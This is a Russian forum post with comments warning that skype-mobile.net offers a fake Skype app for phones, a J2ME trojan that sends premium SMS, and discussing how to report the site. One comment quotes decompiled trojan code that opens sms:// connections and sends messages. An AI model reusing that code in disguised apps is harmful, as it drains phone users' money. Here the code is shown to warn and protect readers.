Мошенники: skype-mobile.net

    Информация для предупреждения возможных проблем.

    Есть такой интересный ресурс — http://skype-mobile.net, который предлагает скачать якобы версии популярной программы Skype для мобильных устройств.

    На деле скачивается не клиент Skype, а приложение Java (23 Кб), которое в поддельном «процессе инсталляции» рассылает SMS на левые короткие номера, в результате чего с вашего счета снимаются деньги.

    Реклама сайта проплачена, по крайней мере в Google, ссылка вываливается в начале поисковой выдачи, например, по запросу «skype windows mobile 6.3».

    Будьте бдительны. Я вот почти попался.

    Если кто-то может посоветовать, каким образом лучше прищучить мошенников — пишите в комментариях.
    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More
    Ads

    Comments 74

      +2
      За что минус, анон?
        +2
        Да сразу же видно, что лохотрон!
          0
          Ну, до меня дошло только после после запуска инсталлятора и вопроса системы — разрешать ли приложению отправлять SMS. На скотски сделанный сайт не обратил внимание — спешил быстрее что-то найти, про 23 Кб подумал, что инсталлятор будет качать остальное из сети. Слоупок, да.
            –9
            Скайп на яве, ага…
              +8
              если я Вас правильно понял — Вы сомневаетесь в наличии скайпа на яве?
              если так то skype.com/intl/ru/download/skype/skypelite/
                –4
                >Звонки через Skype из любой точки мира¹ – соединение с сетью WiFi
                или 3G не требуется.
                мдя, звонки через скайп с телефона :)
                  0
                  Вас смущает скайп на коммуникаторе? Меня почему-то нет.
                    0
                    На коммуникаторе Windows Mobile, к примеру. Там полноценное WinAPI. Ничего не смущает.
                  0
                  Не правильно. Правда я не обмолвился о размере.
              +1
              Ну, вот и замена SMS шпионам:)
              +4
              Стукнуть в абуз-тим гугла?
                –3
                ага. еще можно постучать головой о стену бункера… эффект примерно тот же
                0
                Телефон вроде спрашивает о доступе к SMS, или нет?
                  0
                  не все
                    +1
                    * точнее в некоторых просто можно в настройках явы поставить опцию «можно всё» и он больше никогда ничего не спросит
                      0
                      Так это, вроде, только для подписанных сертификатом приложений?
                      0
                      Нокиа например не полволяет для неподписанных приложени ставить настройку «всегда разрешать». Меня лично это бесит, но в общем применительно к среднестатистическому пользователю это правильно.

                      А вообще, я думаю, что 90% пользователей телефонов не нужен Ява-функционал (как и ВАП, Sim-меню) и прочая зараза, которую производители в сговоре с операторами им подсовывют с целью развода на деньги.
                    0
                    На счет того, как проучить мошенников, на мой взгляд самый лучший вариант это написать непосредственно в тп скайпа. Ибо никто так сильно не захочет прикрыть эту «лавочку» как сами разработчики. Тем более возможностей у них намного больше чем у большинства.
                    p.s. пойду общаться с техподдержкой.
                      0
                      Да уж… воистину ява универсальна и для айфонов, и для симбиана, и для винмобайла — всё один файл skypeMobile.jar :) Лишь бы скачали…
                        +2
                        особенно с учетом что на iphone нет java (без джейла).
                          –1
                          Наоборот :) Без джейла есть, а с джейлом нет ))
                          0
                          Сейчас уже начали любой телефон с тачскрином называть айфоном (как любой mp3-плеер — айпод), поэтому во многих случаях сработает.
                          +1
                          В Firefox: Help → Report Web Forgery…
                            0
                            Спасибо, сам по всем закладкам прошёлся кроме Help.
                              0
                              Уже заблокировали
                            0
                            Друзья — официальный сайт понадежнее будет
                              +1
                              Хм… Не знаю у кого как, но у меня всегда по умолчанию стоит запрет на отправку сообщений из приложений. Я считаю, это лучшая защита. Ну а если уж пользователь сам нажал «Разрешить», то это смс-ка стоимостью 50-300 р, достаточная кара за глупость
                              • UFO just landed and posted this here
                                  –6
                                  Вы считаете что Firefox основной браузер и блокировка в нём данного сайта — решение всех проблем? Вы бы ещё предложили написать производителю телефона.
                                  Нужно написать в Гугл, хостеру и регистратору.
                                    +1
                                    Речь не об этом, а о том что надо распиарасить паразитов :) Даже если и не самим лезть в драку, так хотя бы позвонить в милицию.
                                    0
                                    Firefox использует гугловскую систему предотвращения мошенничества.
                                    То есть в Гугл сообщить проще всего из ff — нажимаешь, потом вводишь капчу, и всё готово.
                                    Что не отменяет возможность/необходимость написать хостеру.
                                      –1
                                      Не знал что ff как то связан с Гугл.
                                          0
                                          Долгое время Гугл был основным спонсором разработки firefox.

                                          А кнопку эту я собственноручно тыкал неделю назад на каком-то очередном vkontakle.ru
                                        +1
                                        FIREFOX: Справка — Сообщите о мошенническом веб-сайте — как раз и отправляет информацию в Гугл, вы бы сами попробовали перед тем как умничать.
                                          –1
                                          Я не пользуюсь браузером Firefox.
                                          Вы сейчас не умничаете?
                                            –1
                                            Тогда может стоило промолчать?
                                              –1
                                              Вы сам с собой разговариваете?
                                              Не нужно меня учить. Без ваших советов обойдусь.
                                    • UFO just landed and posted this here
                                        0
                                        Вы уже внесли свою лепту, у меня в гугле на запрос «skype windows mobile 6.3» этот пост вылетает вторым. А там синим по белому написано «Мошенники».
                                          0
                                          а самого сайта на первых нескольких страницах уже нет (или нет вообще)
                                          0
                                          Написал в тп скайпа. будем ждать ответа.
                                          Правда русскоговорящей поддержки у них нет.
                                            0
                                            Ну уж обфусканный код они, наверняка поймут…
                                              0
                                              security team уже осведомлена, думаю, скоро сайт окончательно прикроют
                                              0
                                              На деле скачивается не клиент Skype, а приложение Java (23 Кб), которое в поддельном «процессе инсталляции» рассылает SMS на левые короткие номера, в результате чего с вашего счета снимаются деньги.

                                              skypeMobile.jar 383 КБ?
                                                +1
                                                Наказать их можно так

                                                  +1
                                                  красивые скриншоты, но это не фишинговый сайт
                                                    0
                                                    Ну если народ подаст много жалоб то он будет в фишинг базе… и исчезнет из поиска
                                                    0
                                                    Особенно впечатлило что оно отправляет на туже страницу что и Лиса. и обзывает там мой Хром Лисой xDDD
                                                      0
                                                      Но тут нет кнопки «Отправить»!
                                                      0
                                                      При попытке загрузки любого из приложений:
                                                      Антивирус Касперского 6.0 для Windows Workstations

                                                      The requested URL mjava.mobi/11565/Skype_Mobile.jar is infected with Trojan-SMS.J2ME.Agent.l virus

                                                      А сообщения о фишинговых сайтах через браузеры обычно не до чего не доводят…
                                                        0
                                                        Откуда этот дистр? у меня качается skype-mobile.net/skypeMobile.jar 383 КБ

                                                        А в вашем, если покопаться jar'е, в m.class можно найти такие строчки

                                                        messageconnection_1 = ((MessageConnection) Connector.open(new StringBuffer().append(«sms://»).append(b[int_1]).toString()));
                                                        TextMessage textmessage_1 = ((TextMessage) ((MessageConnection) Connector.open(new StringBuffer().append(«sms://»).append(b[int_1]).toString())).newMessage(«text»));
                                                        textmessage_1.setAddress(new StringBuffer().append(«sms://»).append(b[int_1]).toString());
                                                        textmessage_1.setPayloadText(a[int_1]);
                                                        System.out.println("===> test start send");
                                                        messageconnection_1.send(textmessage_1);
                                                        System.out.println("===> send ok");

                                                        Таки да, что он отсылает. Получается Касперыч декомпилирует java классы и палит код?
                                                          0
                                                          :) касперский просто уже знает сигнатуру файла
                                                            0
                                                            Откуда этот дистр?

                                                            Просто перешел по одной из ссылок, видимо там было перенаправление…
                                                              0
                                                              Скачалось такое же приложение, 383 КБ. По виду — обычный скайповский ява-апплет. На сенсорном экране не могу протестить — не реагирует.

                                                              Если кто-то отправил сообщение с троянского приложения — очень прошу скинуть мне информацию об отправленном сообщении. (нужен короткий номер и отправленный текст, всё должно быть в исходящих сообщениях) По возможности — можно указать свой номер телефона.

                                                              Я работаю в МегаФоне, связывался с нашими специалистами, которые занимаются блокировкой мошеннических номеров.
                                                                –1
                                                                На будущее — эти Ява-приложения слеплены обычно топорно, так что номер и сообщение отсылаемое хранятся внутри в конфиге (простом текстовом файле), так что не декомпилируя приложение, можно понять, что оно делает :)

                                                                По крайней мере, те, на которые я натыкался, не пытались ничего скрыть или зашифровать. Подозреваю, скоро школьники начнут менять код, чтобы не палиться антивирусами.
                                                                  0
                                                                  Спасибо за «на будущее», но, как я уже сказал, мне скачалось обычное ява-приложение, подписанное скайпом, так что я бы с радостью посмотрел описываемый Вами конфиг, но его нет.
                                                                    +1
                                                                    .jar — это ZIP по натуре, так что переименуйте в .zip и откройте его WinRAR'ом :) Ну или если у вас Тотал Коммандер, просто жмите Ctrl + PgDn — он вроде при этом откроет его как архив. Там где-то и лежит конфиг.

                                                                    Ну и плюс в файлах *.class (компилированный ява-код) можно будет увидеть строчки типа «sms», «MessageConnection» и т.д.
                                                                      0
                                                                      Вы исходную тему читали?! У меня скачивается не «троянское приложение» размером 24 кб, а Skype-клиент размером 383 КБ. Ок?!
                                                                        0
                                                                        Ок, понял) Видимо авторы сайта уже поменяли ссылку на скачивание.
                                                            0
                                                            И все же отправил через фаерфокс! ) я думаю обратят внимание если будет пару десятков жалоб
                                                              0
                                                              Вот правильный линк для abuse AdSense/AdWords: adwords.google.com/support/aw/bin/request.py?display=form&contact_type=tiaff
                                                              Собственно уже отписался туда. Думаю, что не лишним будет повторить.
                                                                0
                                                                Грустно… Когда ж мы уже будем жить в мире, в котором человек здравый и трезвый не будет задумываться, как прищучить мошейника, а спокойно пойдет себе с этим в свое местное отделение милиции и будет уверен, что уж там-то точно разберутся… :) Вне зависимости от того, где эти нехорошие люди хостятся и в какой зоне у них домен…

                                                                Мечты мечты…
                                                                  0
                                                                  У, да этому лохотрону уже несколько мнсяцев. Трансформируется только под разные программы и приложения. Зайдите в Гугл и наберите Jimm — и попробуйте что-нибудь скачать из предложенного в адвордсе. Результат будет тот же — пойдут СМС на разные номера.
                                                                    0
                                                                    Ну вот и все
                                                                      +1
                                                                      Хабрахабра сила.
                                                                      +2
                                                                      Если кто-то (вдруг!) отправил смс — посмотрите в детальке короткий номер и пришлите, пожалуйста, мне.
                                                                      По крайней мере, со стороны одного оператора прикроем.
                                                                        0
                                                                        Не выйдет. Этот номер юзают тысячи честных клиентов смс-биллингов.
                                                                        Отличаются только коды, что на него отправляются.
                                                                          +2
                                                                          Нужна, естественно, не только информация по коротким номерам. Но большую часть её уже взял из топика и по ссылке с мошеннического сайта. Есть специально обученные люди, которые выяснят, какие коды отправляет приложение и заблокируют именно мошенников. Инфо я уже передал.
                                                                        0
                                                                        Для обладателей FF и IE могу порекомендовать ознакомиться с местными топиками mihteh.habrahabr.ru/blog/40192/ и shifttstas.habrahabr.ru/blog/72045/

                                                                        Цитата из одного из данных топиков:

                                                                        «WOT – это сообщество, посвятившее себя поддержке безопасного использования Интернета. Название является сокращением от «Web of Trust» (Сеть доверия). Цель – сделать Интернет безопаснее, позволив пользователям обмениваться опытом, связанным с веб-сайтами и предлагаемыми ими услугами.»
                                                                          0
                                                                          > Если кто-то может посоветовать, каким образом лучше прищучить мошенников — пишите в комментариях.

                                                                          Прищучить сотовых операторов и аггрегаторов, но вы же понимаете. насколько это маловероятно.
                                                                            +1
                                                                            офф ответ от тех.поддержки скайп

                                                                            Original Message Follows:
                                                                            — Name: Anatoliy Mladshev
                                                                            Skype Name: mladshev.a
                                                                            E-mail: mladshev.a@gmail.com
                                                                            Topic: Skype Products (Skype for SIP, Subscriptions, Online
                                                                            number, SMS, Voicemail, etc.)
                                                                            Subtopic: Extras (games, productivity, business, etc.)
                                                                            Subject: skype fake site.
                                                                            Message:

                                                                            — Good day, dear developers.
                                                                            Here's the problem.
                                                                            We founded the site, where people can download fake skype product
                                                                            skype-mobile.net
                                                                            It steals money from users moblie phone.
                                                                            Can u do some thing with that? It can the big problem for your
                                                                            reputation.

                                                                            Hello Anatoliy,

                                                                            Thank you for contacting Skype Support.

                                                                            Thank you for reporting this site.

                                                                            The site that you have provided is now under investigation.

                                                                            We appreciate your vigilance and thank you for your feedback.

                                                                            If you'd like to get more out of Skype, check out our great call
                                                                            packages — www.skype.com/go/getmore/

                                                                            Should you need more assistance, feel free to contact us again; we will
                                                                            be glad to help.

                                                                            Best regards,

                                                                            Gabriella

                                                                            Skype Customer Support

                                                                            Visit www.skype.com for latest news, updates and tips.

                                                                            Only users with full accounts can post comments. Log in, please.